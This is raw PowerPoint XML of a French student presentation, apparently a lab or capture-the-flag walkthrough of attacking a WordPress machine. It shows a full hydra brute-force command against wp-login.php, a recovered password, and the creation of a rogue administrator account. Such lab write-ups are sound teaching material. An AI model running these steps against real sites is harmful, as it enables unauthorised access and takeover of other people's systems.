                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>d‘Exploitation</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"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4348" y="1785926"/>
            <a:ext cx="7286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Une fois que nous </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA" sz="1400" dirty="0" smtClean="0"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA" sz="1400" dirty="0" smtClean="0"/>
              <a:t>vons trouvé le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA" sz="1400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA" sz="1400" dirty="0" smtClean="0"/>
              <a:t> , nous allons maintenant chercher le mot de passe correspondant avec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA" sz="1400" dirty="0" smtClean="0"/>
              <a:t>la même commande </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA" sz="1400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>hydra</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CA" sz="1400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CA" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Pour trouver le mot de passe:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CA" sz="1400" dirty="0" smtClean="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA" sz="1400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>hydra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA" sz="1400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>vV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t> -l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA" sz="1400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>elliot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t> -P </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA" sz="1400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Downloads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sorted_fosocity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t> 10.10.186.105 http-post-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA" sz="1400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t> '/wp-login.php:log=^USER^&amp;pwd=^PASS^&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>wp-submit=log+In:F=is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>incorrect'</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CA" sz="1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86190"/>
            <a:ext cx="723362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357290" y="335756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Mot de passe: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA" b="1" dirty="0" smtClean="0"/>
              <a:t>ER28-0652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8662" y="5500702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 smtClean="0"/>
              <a:t>NB: Vous constatez que l’adresse IP de la machine a changé du fait que nous avons utilisé une autre machine du groupe pour cette commande.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xmlns="" val="265647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  <a:endParaRPr lang="fr-FR"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smtClean="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>3- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Phase d'Exploitation</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"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0100" y="1857364"/>
            <a:ext cx="742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Nous avons réussi a accéder a la page d’administration du site.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-CA" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Q partir de la, nous pouvons ajouter des pages web, créer des utilisateurs et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>meme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-CA" sz="1400" dirty="0" smtClean="0"/>
              <a:t> exfiltrer des informations du site web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7858180" cy="377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111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  <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>DEUXIEME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93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smtClean="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>3- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Phase d'Exploitation</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"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0100" y="1857364"/>
            <a:ext cx="742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Créons un nouvel utilisateur cr310-g14 comme Administrateur du site</a:t>
            </a:r>
            <a:endParaRPr lang="fr-F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28868"/>
            <a:ext cx="878137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857759"/>
            <a:ext cx="2214578" cy="181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000100" y="542926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 se connecte avec notre nouveau compte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711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Première machine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1- Phase de reconnaissance</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1331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16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18" name="AutoShape 6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0" name="AutoShape 8" descr="data:image/png;base64,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HaVCMwGp5NzEtGx7ojlTCITZQSM+8TK7ITufKnCx6F/uIcw50vwBCHFGQycCCYuJ2m2ZiNr+TmNZtMPZDT4zoZvzjqARc++GxREREpO4dhN/hHqxWjxDTdBmFc9IOdGd2Y9jFnJ+xmWsLfEQbJrmWBXaQeNvB547lo5RGfOp1Ye+6oF3AP7em0y0UwaiGjZlu1eZRHdplruS1XP+OZF8U05QBqXH4d5nTKsngkW0ZNCWCJHdr3oooHwlt7M3fEOr6ILHmM+SvWEXtsq2F65gRxLZJBQfI+Zi8H8YTCtuISYuLHuGd21qxeNhgbhy9BdtIxXvSCCITLTAs7DUPkvv7n7XqgYiIiOw/B11QNJKvIqZtAcUzPyEY2N8lOpu2BRmcWRwgI7Yhn3p3Kbg6Pi5JW8eQgIcJKS0ZFRNFugHgkOrL4eKsdK5JW0dsgxa85bUqhDDDCXKEr5g2WETWul8Gm2LqM8xjk1y0jWsLd42HO4XccXwe7aMbscx0h6kbBpZRPO9trB4PEJV7B4XpRbXrimlgr36Q3D+WV93juJP456BjcBf8yNfT00qDs5OO78eL8WFhHf0aMe6DtKAtIiIiwME29GzUJ+LoXjjL38Xv260mtx/YHJmfwcD8XNoHnd2GZ1MKtjK4xM0nDVrwejSckJ3O+b4ALQqz6OOzWZzUjP9GBBi4bRsd6rj7ORFxTI6N54cIa/dqZXlmJJ+nNuf+1ESWVfbslsyjaNkW3EefhbVPxqAtWl54NWcm26wd+z7fZhwUY/IiIiJSSwdXRTGyK56ElfjnZ+w+zcnj0XUbON2GoujG3BQX4IbMLLr4QyxLasOd8R5cgTyuzNxGb5+felis98YzKjGF6Z7SxOSpYrqrJI33N2XSuOzhuqX/xfR02BbXgkHJ0QQJcmJBEaGoRnwWYULQR6/cDBoV53OV309WXBPuj4hkTkpzNvhD5FaTjQy7kJs3r2NgwM139VvyfJTDSVlbuLywmBbBEC7DYlNEPP9Lqs90T03SXICBm1dwq2/7A7v4puERPB8Zblkbe8ssQu374Yn+guKCuk21RtzJXHfZUbjzZ/POqL92Gx4XERGRQ8MeBEUTIyIRo3y1ygnhGFYVB0gYYDhUvkOcH8eXhxPbErNkAyF/mBmNSMYnJ9B0Wzati9N5vjhE0O0mgMNWtxvbLmTI1o0M9BusjU5gFoX0LczgoUCIgsaNmEfV039xxfFOipuuuVvp44fVsQ0Y7zXJ9XgJATgltAo4uMjg35vzmFMvCnBIKfFR4m3Ai+5cHtmcUVaiNVgfF8ErMe5Kqn9BTs7YxAA/rKnXiBFRLhwcCrHJj4hnfIxBalEOZxRncl+GhyWNEtla7fNi8UtCI4YFA5yUvY3uwWpmD2wg5GuMFWtCnQZFi9YXXUXvJJs1733AZFUTRUREDll7EBTjiOjyHlHJIZztGaBwAaHIzliVDXXamwnRqIrpv1E09XH8VgRGKGdnuxW4WRoZRRbZtLWD+OOacXtcCUPTC/jLBRG+HPr4HRx3IsNTG/AHxZRsWsPl/lz6FjfgV6Pq6fOio/g+1kN0wVb6AFs